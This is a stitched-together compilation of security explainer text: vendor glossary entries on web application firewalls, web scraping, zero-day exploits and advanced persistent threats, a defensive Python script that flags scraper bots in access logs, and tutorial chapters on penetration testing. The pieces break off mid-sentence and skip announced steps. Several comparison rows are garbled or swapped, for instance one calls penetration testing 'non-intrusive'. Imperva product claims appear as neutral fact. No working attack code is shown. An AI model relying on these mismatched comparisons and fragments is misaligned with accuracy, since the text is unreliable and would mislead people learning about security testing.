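    print("allow-list accepts tautology:", validate_username(TAUTOLOGY))
```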
For this reason, a web application firewall (WAF) is commonly employed to filter out
SQLI, as well as other online threats. To do so, a WAF typically relies on a large, and
constantly updated, list of meticulously crafted signatures that allow it to surgically weed
out malicious SQL queries. Usually, such a list holds signatures to address specific attack
vectors, and is regularly patched to introduce blocking rules for newly discovered
vulnerabilities.
Modern web application firewalls are also often integrated with other security solutions.
From these, a WAF can receive additional information that further augments its security
capabilities.
For example, a web application firewall that encounters a suspicious, but not outright
malicious, input may cross-verify it with IP data before deciding to block the request.
It only blocks the input if the IP itself has a bad reputational history.
Imperva cloud-based WAF uses signature recognition, IP reputation and other security
methodologies to identify and block SQL injections, with a minimal amount of false
positives. The WAF’s capabilities are augmented by IncapRules—a custom security rule
engine that enables granular customization of default security settings and the creation of
additional case-specific security policies.
Our WAF also employs crowdsourcing techniques that ensure that new threats targeting
any user are immediately propagated across the entire user-base. This enables rapid
response to newly disclosed vulnerabilities and zero-day threats.
WEB SCRAPING- Web scraping is the process of using bots to extract content and data from a
website.
Unlike screen scraping, which only copies pixels displayed onscreen, web scraping
extracts underlying HTML code and, with it, data stored in a database. The scraper can
then replicate entire website content elsewhere.
Web scraping is used in a variety of digital businesses that rely on data harvesting.
Legitimate use cases include:
Search engine bots crawling a site, analyzing its content and then ranking it.
Price comparison sites deploying bots to auto-fetch prices and product descriptions for
allied seller websites.
Market research companies using scrapers to pull data from forums and social media
(e.g., for sentiment analysis).
Web scraping is also used for illegal purposes, including the undercutting of prices and
the theft of copyrighted content. An online entity targeted by a scraper can suffer severe
financial losses, especially if it’s a business strongly relying on competitive pricing
models or deals in content distribution.
SCRAPER TOOLS AND BOTS
Web scraping tools are software (i.e., bots) programmed to sift through databases and
extract information. A variety of bot types are used, many being fully customizable to:
Recognize unique HTML site structures
Extract and transform content
Store scraped data
Extract data from APIs
Since all scraping bots have the same purpose—to access site data—it can be difficult to
distinguish between legitimate and malicious bots.
That said, several key differences help distinguish between the two.
Legitimate bots are identified with the organization for which they scrape. For example,
Googlebot identifies itself in its HTTP header as belonging to Google. Malicious bots,
conversely, impersonate legitimate traffic by creating a false HTTP user agent.
Legitimate bots abide by a site’s robots.txt file, which lists those pages a bot is permitted to
access and those it cannot. Malicious scrapers, on the other hand, crawl the website
regardless of what the site operator has allowed.
Resources needed to run web scraper bots are substantial—so much so that legitimate
scraping bot operators heavily invest in servers to process the vast amount of data being
extracted.
A perpetrator, lacking such a budget, often resorts to using a botnet—geographically
dispersed computers, infected with the same malware and controlled from a central
location. Individual botnet computer owners are unaware of their participation. The
combined power of the infected systems enables large scale scraping of many different
websites by the perpetrator.
In price scraping, a perpetrator typically uses a botnet from which to launch scraper bots
to inspect competing business databases. The goal is to access pricing information,
undercut rivals and boost sales.
Attacks frequently occur in industries where products are easily comparable and price
plays a major role in purchasing decisions. Victims of price scraping can include travel
agencies, ticket sellers and online electronics vendors.
For example, smartphone e-traders, who sell similar products for relatively consistent
prices, are frequent targets. To remain competitive, they’re motivated to offer the best
prices possible, since customers usually go for the lowest cost offering. To gain an edge,
a vendor can use a bot to continuously scrape his competitors’ websites and instantly
update his own prices accordingly.
For perpetrators, a successful price scraping can result in their offers being prominently
featured on comparison websites—used by customers for both research and purchasing.
Meanwhile, scraped sites often experience customer and revenue losses.
CONTENT SCRAPING
Content scraping comprises large-scale content theft from a given site. Typical targets
include online product catalogues and websites relying on digital content to drive
business. For these enterprises, a content scraping attack can be devastating.
For example, online local business directories invest significant amounts of time, money
and energy constructing their database content. Scraping can result in it all being released
into the wild, used in spamming campaigns or resold to competitors. Any of these events
is likely to impact a business’ bottom line and its daily operations.
The following is excerpted from a complaint, filed by Craigslist, detailing its experience
with content scraping. It reinforces how damaging the practice can be:
“[The content scraping service] would, on a daily basis, send an army of digital robots to
craigslist to copy and download the full text of millions of craigslist user ads. [The
service] then indiscriminately made those misappropriated listings available—through its
so-called ‘data feed’—to any company that wanted to use them, for any purpose. Some
such ‘customers’ paid as much as $20,000 per month for that content…”
According to the claim, scraped data was used for spam and email fraud, among other
activities:
“[The defendants] then harvest craigslist users’ contact information from that database,
and initiate many thousands of electronic mail messages per day to the addresses
harvested from craigslist servers…. [The messages] contain misleading subject lines and
content in the body of the spam messages, designed to trick craigslist users into switching
from using craigslist’s services to using [the defendants’] service…”
WEB SCRAPING PROTECTION
The increased sophistication in malicious scraper bots has rendered some common
security measures ineffective. For example, headless browser bots can masquerade as
humans as they fly under the radar of most mitigation solutions.
To counter advances made by malicious bot operators, Imperva uses granular traffic
analysis. It ensures that all traffic coming to your site, human and bot alike, is completely
legitimate.
The process involves the cross verification of factors, including:
HTML fingerprint – The filtering process starts with granular inspection of HTML
headers. These can provide clues as to whether a visitor is human or bot, and malicious or
safe. Header signatures are compared against a constantly updated database of over 10
million known variants.
IP reputation – We collect IP data from all attacks against our clients. Visits from IP
addresses having a history of being used in assaults are treated with suspicion and are
more likely to be scrutinized further.
Behavior analysis – Tracking the ways visitors interact with a website can reveal
abnormal behavioral patterns, such as a suspiciously aggressive rate of requests and
illogical browsing patterns. This helps identify bots that pose as human visitors.
Progressive challenges – We use a set of challenges, including cookie support and
JavaScript execution, to filter out bots and minimize false positives. As a last resort, a
CAPTCHA challenge can weed out bots attempting to pass themselves off as humans.
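The signals listed above, applied to constructed access-log lines as an added example (not code from the original page or from Imperva): a Python scorer that checks request rate, robots.txt compliance via the standard library's urllib.robotparser, a constructed IP reputation list, and whether a visitor claiming to be Googlebot comes from a verified address. The Googlebot address list is an assumption standing in for the reverse-DNS verification a real deployment would do; every IP, path and log line is constructed.

```python
"""Scraper-bot triage over web access-log lines.

Added example, not code from the original page or from Imperva. It applies the
signals the page lists (self-identifying crawlers, robots.txt compliance, IP
reputation, request rate) to constructed Apache combined-format log lines.
"""
import re
import urllib.robotparser
from collections import defaultdict
from datetime import datetime

# Constructed robots.txt for the sample site (assumption, not a real site).
ROBOTS_TXT = """User-agent: *
Disallow: /admin/
Disallow: /api/prices
"""

# Constructed reputation data. A real deployment verifies a claimed Googlebot
# with a reverse-DNS lookup; an IP allowlist stands in for that here.
KNOWN_CRAWLERS = {"Googlebot": {"192.0.2.10"}}
BAD_REPUTATION = {"198.51.100.7"}

UA_BROWSER = "Mozilla/5.0 (Windows NT 10.0) Chrome/117"
UA_GOOGLEBOT = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"


def _line(ip, ts, path, ua, status=200):
    """Build one constructed Apache combined-format log line."""
    return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" {status} 512 "-" "{ua}"'


# Constructed sample traffic: a browsing human, a verified crawler and a scraper
# that spoofs Googlebot, hammers the site and ignores robots.txt.
SAMPLE_LOG = "\n".join(
    [_line("203.0.113.5", "10/Oct/2023:13:55:00 +0000", "/products/1", UA_BROWSER),
     _line("203.0.113.5", "10/Oct/2023:13:55:30 +0000", "/products/2", UA_BROWSER),
     _line("203.0.113.5", "10/Oct/2023:13:56:00 +0000", "/cart", UA_BROWSER),
     _line("192.0.2.10", "10/Oct/2023:13:55:05 +0000", "/robots.txt", UA_GOOGLEBOT),
     _line("192.0.2.10", "10/Oct/2023:13:55:10 +0000", "/products/1", UA_GOOGLEBOT)]
    + [_line("198.51.100.7", "10/Oct/2023:13:57:00 +0000", f"/products/{i}", UA_GOOGLEBOT)
       for i in range(1, 7)]
    + [_line("198.51.100.7", "10/Oct/2023:13:57:00 +0000", "/api/prices?sku=1", UA_GOOGLEBOT),
       _line("198.51.100.7", "10/Oct/2023:13:57:01 +0000", "/admin/", UA_GOOGLEBOT)]
)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        entry = m.groupdict()
        entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
        entries.append(entry)
    return entries


def build_robots(text):
    """Load a robots.txt body into the standard-library parser."""
    rp = urllib.robotparser.RobotFileParser()
    rp.parse(text.splitlines())
    return rp


def score_clients(entries, robots, max_rate=5.0):
    """Return {ip: [flag, ...]}; an empty list means no scraper signal fired."""
    by_ip = defaultdict(list)
    for e in entries:
        by_ip[e["ip"]].append(e)
    report = {}
    for ip, reqs in by_ip.items():
        reqs.sort(key=lambda e: e["ts"])
        flags = []
        # Behaviour analysis: requests per second over the observed window
        # (a window shorter than one second is treated as one second).
        span = (reqs[-1]["ts"] - reqs[0]["ts"]).total_seconds()
        rate = len(reqs) / max(span, 1.0)
        if rate > max_rate:
            flags.append(f"high request rate ({rate:.1f}/s)")
        # robots.txt compliance: legitimate crawlers stay out of disallowed paths.
        disallowed = [e["path"] for e in reqs if not robots.can_fetch(e["ua"], e["path"])]
        if disallowed:
            flags.append(f"robots.txt ignored ({len(disallowed)} disallowed requests)")
        # IP reputation: addresses previously seen in attacks.
        if ip in BAD_REPUTATION:
            flags.append("IP on reputation blocklist")
        # Identity check: a crawler's claimed identity must match a verified source.
        for name, verified_ips in KNOWN_CRAWLERS.items():
            if any(name in e["ua"] for e in reqs) and ip not in verified_ips:
                flags.append(f"claims to be {name} from an unverified address")
        report[ip] = flags
    return report


if __name__ == "__main__":
    for ip, flags in score_clients(parse_log(SAMPLE_LOG), build_robots(ROBOTS_TXT)).items():
        print(ip, "->", flags or ["no scraper signals"])
```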
ZERO-DAY (0DAY) EXPLOIT-A zero-day (0day) exploit is a cyber attack targeting a
software vulnerability which is unknown to the software vendor or to antivirus vendors. The
attacker spots the software vulnerability before any parties interested in mitigating it, quickly
creates an exploit, and uses it for an attack. Such attacks are highly likely to succeed because
defenses are not in place. This makes zero-day attacks a severe security threat.
Typical attack vectors include Web browsers, which are common targets due to their
ubiquity, and email attachments that exploit vulnerabilities in the application opening the
attachment, or in specific file types such as Word, Excel, PDF or Flash.
A related concept is zero-day malware — a computer virus for which specific antivirus
software signatures are not yet available, so signature-based antivirus software cannot
stop it.
Typical targets for a zero-day exploit include:
Government departments.
Large enterprises.
Individuals with access to valuable business data, such as intellectual property.
Large numbers of home users who use a vulnerable system, such as a browser or
operating system. Hackers can use vulnerabilities to compromise computers and build
massive botnets.
Hardware devices, firmware and Internet of Things (IoT).
In some cases governments use zero-day exploits to attack individuals, organizations or
countries who threaten their national security.
Because zero-day vulnerabilities are valuable for different parties, a market exists in
which organizations pay researchers who discover vulnerabilities. In addition to this
‘white market’, there are gray and black markets in which zero-day vulnerabilities are
traded, without public disclosure, for up to hundreds of thousands of dollars.
EXAMPLES OF ZERO-DAY ATTACKS
Some high-profile examples of zero-day attacks include:
Stuxnet: This malicious computer worm targeted computers used for manufacturing
purposes in several countries, including Iran, India, and Indonesia. The primary target
was Iran’s uranium enrichment plants, with the intention of disrupting the country’s
nuclear program.
The zero-day vulnerabilities existed in software running on industrial computers known
as programmable logic controllers (PLCs), which ran on Microsoft Windows. The worm
infected the PLCs through vulnerabilities in Siemens Step7 software, causing the PLCs to
carry out unexpected commands on assembly line machinery, sabotaging the centrifuges
used to separate nuclear material.
Sony zero-day attack: Sony Pictures was the victim of a zero-day exploit in late 2014.
The attack crippled Sony’s network and led to the release of sensitive corporate data on
file-sharing sites. The compromised data included details of forthcoming movies,
business plans, and the personal email addresses of senior Sony executives. The details of
the exact vulnerability exploited in the Sony attack remain unknown.
RSA: In 2011, hackers used a then-unpatched vulnerability in Adobe Flash Player to gain
access to the network of security company RSA. The attackers sent emails with Excel
spreadsheet attachments to small groups of RSA employees. The spreadsheets contained
an embedded Flash file that exploited the zero-day Flash vulnerability. When one of the
employees opened the spreadsheet, the attacker installed the Poison Ivy remote
administration tool to take control of the computer.
Once they gained access to the network, attackers searched for sensitive information,
copied it and transmitted it to external servers they controlled. RSA admitted that among
the data stolen was sensitive information related to the company’s SecurID two-factor
authentication products, used around the world for access to sensitive data and devices.
Operation Aurora: This 2009 zero-day exploit targeted the intellectual property of several
major enterprises, including Google, Adobe Systems, Yahoo, and Dow Chemical. The
vulnerabilities existed in both Internet Explorer and Perforce; the latter was used by
Google to manage its source code.
ZERO-DAY VULNERABILITY DETECTION
By definition, no patches or antivirus signatures exist yet for zero-day exploits, making
them difficult to detect. However, there are several ways to detect previously unknown
software vulnerabilities.
VULNERABILITY SCANNING
Vulnerability scanning can detect some zero-day exploits. Security vendors who offer
vulnerability scanning solutions can simulate attacks on software code, conduct code
reviews, and attempt to find new vulnerabilities that may have been introduced after a
software update.
This approach cannot detect all zero-day exploits. But even for those it detects, scanning
is not enough—organizations must act on the results of a scan, perform code review and
sanitize their code to prevent the exploit. In reality, most organizations are slow to
respond to newly discovered vulnerabilities, while attackers can be very quick to exploit
a zero-day vulnerability.
PATCH MANAGEMENT
Another strategy is to deploy software patches as soon as possible for newly discovered
software vulnerabilities. While this cannot prevent zero-day attacks, quickly applying
patches and software upgrades can significantly reduce the risk of an attack.
However, there are three factors that can delay the deployment of security patches.
Software vendors take time to discover vulnerabilities, develop a patch and distribute it to
users. It can also take time for the patch to be applied on organizational systems. The
longer this process takes, the higher the risk of a zero-day attack.
INPUT VALIDATION AND SANITIZATION
Possibly the most effective way to prevent zero-day attacks is deploying a web
application firewall (WAF) on the network edge. A WAF reviews all incoming traffic
and filters out malicious inputs that might target security vulnerabilities.
Input validation solves many of the issues inherent in vulnerability scanning and patch
management. It doesn’t leave organizations unprotected while they are patching systems
or sanitizing code—processes that can take time. It is operated by security experts and is
much more flexible, able to adapt and respond to new threats in real time.
ZERO-DAY INITIATIVE
A program established to reward security researchers for responsibly disclosing
vulnerabilities, instead of selling the information on the black market. Its objective is to
create a broad community of vulnerability researchers who can discover security
vulnerabilities before hackers do, and alert software vendors.
IMPERVA ZERO-DAY THREAT MITIGATION
Vulnerability scanning and patch management are partial solutions to zero-day attacks.
And they create a large window of vulnerability, due to the time it takes to develop and
apply patches and code fixes.
Imperva’s Web Application Firewall (WAF) is a managed input validation service
deployed at the edge of your network which intelligently filters and verifies incoming
traffic, blocking attacks at the network edge.
Imperva cloud-based WAF blocks zero-day attacks by using crowdsourced security to
identify new threats
Imperva cloud-based WAF leverages crowdsourced security to protect against zero-day
attacks, aggregating attack data to react to threats instantly. As soon as a new threat is
identified anywhere on the Incapsula network, a mitigation path is quickly deployed to
safeguard the entire user base.
ADVANCED PERSISTENT THREAT (APT)- An advanced persistent threat (APT) is a broad
term used to describe an attack campaign in which an intruder, or team of intruders, establishes
an illicit, long-term presence on a network in order to mine highly sensitive data.
The targets of these assaults, which are very carefully chosen and researched, typically
include large enterprises or governmental networks. The consequences of such intrusions
are vast, and include:
Intellectual property theft (e.g., trade secrets or patents)
Compromised sensitive information (e.g., employee and user private data)
The sabotaging of critical organizational infrastructures (e.g., database deletion)
Total site takeovers
Executing an APT assault requires more resources than a standard web application attack.
The perpetrators are usually teams of experienced cybercriminals having substantial
financial backing. Some APT attacks are government-funded and used as cyber warfare
weapons.
APT attacks differ from traditional web application threats, in that:
They’re significantly more complex.
They’re not hit and run attacks—once a network is infiltrated, the perpetrator remains in
order to attain as much information as possible.
They’re manually executed (not automated) against a specific mark, rather than
indiscriminately launched against a large pool of targets.
They often aim to infiltrate an entire network, as opposed to one specific part.
More common attacks, such as remote file inclusion (RFI), SQL injection and cross-site
scripting (XSS), are frequently used by perpetrators to establish a foothold in a targeted
network. Next, Trojans and backdoor shells are often used to expand that foothold and
create a persistent presence within the targeted perimeter.
ADVANCED PERSISTENT THREAT (APT) PROGRESSION
A successful APT attack can be broken down into three stages: 1) network infiltration, 2)
the expansion of the attacker’s presence and 3) the extraction of amassed data—all
without being detected.
STAGE 1 – INFILTRATION
Enterprises are typically infiltrated through the compromising of one of three attack
surfaces: web assets, network resources or authorized human users.
This is achieved either through malicious uploads (e.g., RFI, SQL injection) or social
engineering attacks (e.g., spear phishing)—threats faced by large organizations on a
regular basis.
Additionally, infiltrators may simultaneously execute a DDoS attack against their target.
This serves both as a smoke screen to distract network personnel and as a means of
weakening a security perimeter, making it easier to breach.
Once initial access has been achieved, attackers quickly install a backdoor shell—
malware that grants network access and allows for remote, stealth operations. Backdoors
can also come in the form of Trojans masked as legitimate pieces of software.
STAGE 2 – EXPANSION
After the foothold is established, attackers move to broaden their presence within the
network.
This involves moving up an organization’s hierarchy, compromising staff members with
access to the most sensitive data. In doing so, they’re able to gather critical business
information, including product line information, employee data and financial records.
Depending on the ultimate attack goal, the accumulated data can be sold to a competing
enterprise, altered to sabotage a company’s product line or used to take down an entire
organization. If sabotage is the motive, this phase is used to subtly gain control of
multiple critical functions and manipulate them in a specific sequence to cause maximum
damage. For example, attackers could delete entire databases within a company and then
disrupt network communications in order to prolong the recovery process.
STAGE 3- EXTRACTION
While an APT event is underway, stolen information is typically stored in a secure
location inside the network being assaulted. Once enough data has been collected, the
thieves need to extract it without being detected.
Typically, white noise tactics are used to distract your security team so the information
can be moved out. This might take the form of a DDoS attack, again tying up network
personnel and/or weakening site defenses to facilitate extraction.
Whitelisting is a way of controlling domains that can be accessed from your network, as
well as applications that can be installed by your users. This is another useful method of
reducing the success rate of APT attacks by minimizing available attack surfaces.
This security measure is far from foolproof, however, as even the most trusted domains
can be compromised. It’s also known that malicious files commonly arrive under the
guise of legitimate software. In addition, older software product versions are prone to
being compromised and exploited.
For effective whitelisting, strict update policies should be enforced to ensure your users
are always running the latest version of any application appearing on the list.
ACCESS CONTROL
For perpetrators, your employees typically represent the largest and most vulnerable soft
spot in your security perimeter. More often than not, this is why your network users are
viewed by intruders as an easy gateway to infiltrate your defenses, while expanding their
hold within your security perimeter.
Here, likely targets fall into one of the following three categories:
Careless users who ignore network security policies and unknowingly grant access to
potential threats.
Malicious insiders who intentionally abuse their user credentials to grant perpetrator
access.
Compromised users whose network access privileges are compromised and used by
attackers.
Developing effective controls requires a comprehensive review of everyone in your
organization—especially the information to which they have access. For example,
classifying data on a need-to-know basis helps block an intruder’s ability to hijack login
credentials from a low-level staff member and use them to access sensitive materials.
Key network access points should be secured with two-factor authentication (2FA). It
requires users to use a second form of verification when accessing sensitive areas
(typically a passcode sent to the user’s mobile device). This prevents unauthorized actors
disguised as legitimate users from moving around your network.
ADDITIONAL MEASURES
In addition to those above, these are best practice measures to take when securing your
network:
Patching network software and OS vulnerabilities as quickly as possible.
Encryption of remote connections to prevent intruders from piggy-backing them to
infiltrate your site.
Filtering incoming emails to prevent spam and phishing attacks targeting your network.
Immediate logging of security events to help improve whitelists and other security
policies.
Steps of Penetration Testing Method
The following are the seven steps of penetration testing −
Reconnaissance
Reconnaissance includes an analysis of the preliminary information. Many times, a tester doesn’t
have much information other than the preliminary information, i.e., an IP address or IP address
block. The tester starts by analyzing the available information and, if required, requests more
information such as system descriptions, network plans, etc. from the client. This step is, in a
sense, a passive penetration test. Its sole objective is to obtain complete and detailed
information about the systems.
Discovery
In this step, a penetration tester will most likely use automated tools to scan target assets for
vulnerabilities. These tools normally have their own databases giving the details of the latest
vulnerabilities. However, the tester also discovers −
Network Discovery − Such as discovery of additional systems, servers, and other devices.
Host Discovery − It determines open ports on these devices.
Service Interrogation − It interrogates ports to discover actual services which are running
on them.
Final Analysis
This step primarily considers all the steps conducted (discussed above) till that time and an
evaluation of the vulnerabilities present in the form of potential risks. Further, the tester
recommends to eliminate the vulnerabilities and risks. Above all, the tester must assure the
transparency of the tests and the vulnerabilities that it disclosed.
Report Preparation
Report preparation must start with the overall testing procedures, followed by an analysis of
vulnerabilities and risks. High risks and critical vulnerabilities must be given priority,
followed by those of lower order.
However, while documenting the final report, the following points need to be considered −
Overall summary of penetration testing.
Details of each step and the information gathered during the pen testing.
Details of all the vulnerabilities and risks discovered.
Details of cleaning and fixing the systems.
Suggestions for future security.
Generally, these two terms, i.e., Penetration Testing and Vulnerability Assessment, are used
interchangeably by many people, either because of misunderstanding or marketing hype.
But the two terms differ from each other in their objectives and other respects. However,
before describing the differences, let us first understand both terms one by one.
Penetration Testing
Penetration testing replicates the actions of an external and/or internal cyber attacker who
intends to break the information security and steal the valuable data or disrupt the
normal functioning of the organization. So, with the help of advanced tools and techniques,
a penetration tester (also known as an ethical hacker) makes an effort to gain control of critical
systems and acquire access to sensitive data.
Vulnerability Assessment
On the other hand, a vulnerability assessment is the technique of identifying (discovery)
and measuring security vulnerabilities (scanning) in a given environment. It is a
comprehensive assessment of the information security position (result analysis). Further,
it identifies the potential weaknesses and provides the proper mitigation measures
(remediation) to either remove those weaknesses or reduce them below the risk level.
The following diagram summarizes the vulnerability assessment −
The following table illustrates the fundamental differences between penetration testing and
vulnerability assessments −
Penetration Testing: Cleans up the system and gives final report.
Vulnerability Assessment: Attempts to mitigate or eliminate the potential vulnerabilities of
valuable resources.
Penetration Testing: It is non-intrusive, documentation and environmental review and analysis.
Vulnerability Assessment: Comprehensive analysis and thorough review of the target system and
its environment.
For better understanding, let us discuss each of them in detail −
White Box Penetration Testing
This is comprehensive testing, as the tester has been provided with the whole range of information
about the systems and/or network, such as schema, source code, OS details, IP addresses, etc. It is
normally considered a simulation of an attack by an internal source. It is also known as
structural, glass box, clear box, and open box testing.
White box penetration testing examines the code coverage and does data flow testing, path testing,
loop testing, etc.
The response or workflow of the system − This is the third area that needs to be tested.
Social engineering gathers information on human interaction to obtain information about
an organization and its computers. It is beneficial to test the ability of the respective
organization to prevent unauthorized access to its information systems. Likewise, this test
is exclusively designed for the workflow of the organization/company.
Both manual penetration testing and automated penetration testing are conducted for the same
purpose. The only difference between them is the way they are conducted. As the name suggests,
manual penetration testing is done by human beings (experts in this field) and automated
penetration testing is done by a machine.
This chapter will help you learn the concept, differences, and applicability of both the terms.
Types of Manual Penetration Testing
Manual penetration testing is normally categorized in the following two ways −
Focused Manual Penetration Testing − It is a highly focused method that tests specific
vulnerabilities and risks. Automated penetration testing cannot perform this testing; it is
done only by human experts who examine specific application vulnerabilities within the
given domains.
Comprehensive Manual Penetration Testing − It is thorough testing of whole systems
connected with each other to identify all sorts of risks and vulnerabilities. However, the
function of this testing is more situational, such as investigating whether multiple lower-
risk faults can combine into a more serious attack scenario, etc.
What is Automated Penetration Testing?
Automated penetration testing is much faster, more efficient, easier and more reliable, testing
the vulnerabilities and risks of a machine automatically. This technology does not require an
expert engineer; rather, it can be run by any person having the least knowledge of this field.
Tools for automated penetration testing include Nessus, Metasploit, OpenVAS, BackTrack (series 5),
etc. These are very efficient tools that changed the efficiency and meaning of penetration testing.
However, the following table illustrates the fundamental differences between manual and
automated penetration testing −
Manual Penetration Testing: It requires different tools for the testing.
Automated Penetration Testing: It has integrated tools and does not require anything from
outside.
Manual Penetration Testing: In this type of testing, results can vary from test to test.
Automated Penetration Testing: It has a fixed result.
Penetration testing, normally consists of information gathering, vulnerability and risk analysis,
vulnerability exploits, and final report preparation.
It is also essential to learn the features of the various tools which are available for penetration
testing. This chapter provides information and insights about these features.
Xprobe − Purpose: Remote active OS fingerprinting; Port scanning; TCP fingerprinting.
Platform: Linux. Cost: Free.
Metasploit Framework − Purpose: Develop and execute exploit code against a remote target; Test
vulnerability of computer systems. Platform: All versions of Unix and Windows. Cost: Free.
Computer systems and associated networks normally consist of a large number of devices, and
most of them play a major role in the overall operation and business of the respective system.
A minor flaw at any point in time, and in any part of these devices, may cause great damage to
your business. Therefore, all of them are vulnerable to risk and need to be secured properly.
External Infrastructure Testing
The penetration test targeting the external infrastructure discovers what a hacker could do with
your networks, which are easily accessible through the Internet.
In this testing, a tester normally replicates the same kind of attacks that hackers can use, by
finding and mapping the security flaws in your external infrastructure.
There are various benefits of leveraging external infrastructure penetration testing, as it −
Identifies the flaws within the firewall configuration that could be misused
Finds out how information can be leaked out from your system by an attacker
Suggests how these issues can be fixed
Prepares a comprehensive report highlighting the security risk of the border networks, and
suggests solutions
Ensures overall efficiency and productivity of your business
Cloud and Virtualization Penetration Testing
As you buy a public server or web space, it significantly increases the risk of a data breach.
Further, identifying an attacker in a cloud environment is difficult. An attacker can also buy
hosting in a cloud facility to get access to your new cloud data.
In fact, most cloud hosting is implemented on virtual infrastructure, introducing virtualization
risks that an attacker can easily exploit.
Cloud and Virtualization penetration testing benefits as it −
Discovers the real risks within the virtual environment and suggests the methods and costs to fix the
threats and flaws.
Provides guidelines and an action plan on how to resolve the issue(s).
Improves the overall protection system.
Prepares a comprehensive security report on the cloud computing and virtualization environment,
outlining the security flaws, their causes and possible solutions.
Past Experience
The following questions will help you to hire an effective penetration tester −
How many years of experience does the penetration tester have?
Is he an independent penetration tester or working for an organization?
With how many companies has he worked as a penetration tester?
Has he performed penetration testing for any organization which has a similar size and
scope as yours?
What type of experience does the penetration tester have? For example, conducting
network-layer penetration testing, etc.
You may also ask for references from other customers for whom he has worked.
When hiring a penetration tester, it is important to evaluate the past year’s testing experience of
the organization for which the tester has worked, as it relates to the technologies the tester has
specifically deployed within the target environment.
In addition to the above, for complex situations and typical client requirements, it is recommended
to evaluate a tester’s capability to handle similar environments in his/her earlier projects.
Report Planning
Information Collection
Writing the First Draft
Review and Finalization
Report Planning
Report planning starts with the objectives, which help readers to understand the main points of
the penetration testing. This part describes why the testing is conducted, what are the benefits of
pen testing, etc. Secondly, report planning also includes the time taken for the testing.
Major elements of report writing are −
Objectives − It describes the overall purpose and benefits of pen testing.
Time − Inclusion of time is very important, as it gives the accurate status of the system.
Suppose anything goes wrong later; this report will protect the tester, as it will document
the risks and vulnerabilities within the penetration testing scope during that specific
period of time.
Target Audience − Pen testing report also needs to include target audience, such as
information security manager, information technology manager, chief information
security officer, and technical team.
Report Classification − Since the report is highly confidential, carrying server IP addresses,
application information, vulnerabilities and threats, it needs to be classified properly. This
classification should follow the target organization’s information classification policy.
Report Distribution − The number of copies and the report distribution should be mentioned in
the scope of work. It also needs to mention that hardcopies can be controlled by printing a
limited number of copies, each marked with its copy number and the recipient’s name.
Information Collection
Because of the complicated and lengthy processes, the pen tester is required to record every step to
make sure that he has collected all the information in all the stages of testing. Along with the
methods, he also needs to mention the systems and tools used, scanning results, vulnerability
assessments, details of his findings, etc.
Writing the First Draft
Once the tester is ready with all the tools and information, he needs to start the first draft.
Primarily, he needs to write the first draft in detail, mentioning everything, i.e. all activities,
processes, and experiences.
Review and Finalization
Once the report is drafted, it has to be reviewed first by the drafter himself and then by his seniors
or colleagues who may have assisted him. While reviewing, reviewer is expected to check every
detail of the report and find any flaw that needs to be corrected.
Content of Penetration Testing Report
Following is the typical content of a penetration testing report −
Executive Summary
Scope of work
Project objectives
Assumption
Timeline
Summary of findings
Summary of recommendation
Methodology
Planning
Exploitation
Reporting
Detail Findings
References
Appendix
The fast growth of the internet has changed the way of life for everyone. These days, most
private and public work is internet dependent; even governments' confidential plans and
operations are internet based. All of this has made life very simple and information easily accessible.
But alongside the good news there is also a dark side to this development: the criminal hacker.
Criminal hackers face no geopolitical limitation; they can attack any system from any part of the
world, and they can badly damage confidential data and credit histories.
Therefore, to protect against criminal hackers, the concept of the ethical hacker evolved. This
chapter discusses the concept and the role of an ethical hacker.
Who are Ethical Hackers?
Ethical hackers are computer experts who are legally allowed to hack a computer system, with
the objective of protecting it from criminal hackers. An ethical hacker identifies the vulnerabilities
and risks of a system and suggests how to eliminate them.
Who are Criminal Hackers?
Criminal hackers are computer experts who break into other people's systems with the
intention of stealing data, stealing money, damaging others' credit, destroying others' data,
blackmailing someone, etc.
What can Criminal Hackers do?
Once a system is hacked, a criminal hacker can do anything with that system. The following two
images, from a paper by C.C. Palmer published on pdf.textfiles.com, illustrate a simple example
of a defaced web page −
[Screenshot: the webpage before it was hacked]
[Screenshot: the same webpage after it was hacked]
procedures. Finally, he prepares a final report of all the ethical activities that he performed and
observed while carrying out the penetration test.
Types of Hackers
Hackers are normally divided into three categories.
Penetration Testing
Penetration testing is a specific term: it focuses only on discovering the vulnerabilities and risks
in the target environment, with the purpose of securing the system (or, from the tester's side,
taking control of it). In other words, penetration testing targets the organization's defence
systems, consisting of all its computer systems and infrastructure.
Ethical Hacking
Ethical hacking, on the other hand, is a broader term that covers all hacking techniques and
other associated computer attack techniques. Along with discovering security flaws and
vulnerabilities and ensuring the security of the target system, it goes beyond hacking a single
system; it is done with permission in order to safeguard security for the future. Hence we can say
that ethical hacking is an umbrella term and penetration testing is one of its components.
The major differences between penetration testing and ethical hacking are listed below −
Skills − Penetration testing: any tester with some penetration testing background can perform
a pen test. Ethical hacking: it requires an expert professional in the subject, who has the
relevant ethical hacking certification, to be effective.
Paperwork − Penetration testing: less paperwork compared to ethical hacking. Ethical hacking:
detailed paperwork is required, including a legal agreement, etc.
Time − Penetration testing: less time is required to perform this type of testing. Ethical
hacking: it involves a lot of time and effort compared to penetration testing.
Access − Penetration testing: normally, access to the whole computer estate and its
infrastructure is not required; access is needed only to the part being tested. Ethical hacking:
depending on the situation, it normally requires a whole range of access to all computer
systems and infrastructure.
Since penetration techniques are used to protect against threats, the potential attackers are also
swiftly becoming more sophisticated and finding new weak points in current applications. Hence
a single penetration test is not sufficient to protect the security of the tested systems.
There have been cases where a new security loophole was discovered, and a successful attack took
place, immediately after a penetration test. That does not mean penetration testing is useless. It
only means that even thorough penetration testing is no guarantee that a successful attack will
not take place; it does, however, substantially reduce the likelihood of one.
Because of the swift pace of developments in information technology, the value of a penetration
test is comparatively short-lived. The more protection the systems require, the more often
penetration testing needs to be performed, to reduce the possibility of a successful attack to a
level the company accepts.
Following are the major limitations of Penetration Testing −
Limitation of Time − Attacking a system is not a time-bound exercise, but penetration testers
are allotted a fixed amount of time for each test. Attackers have no such constraint; they can
plan over a week, a month, or even years.
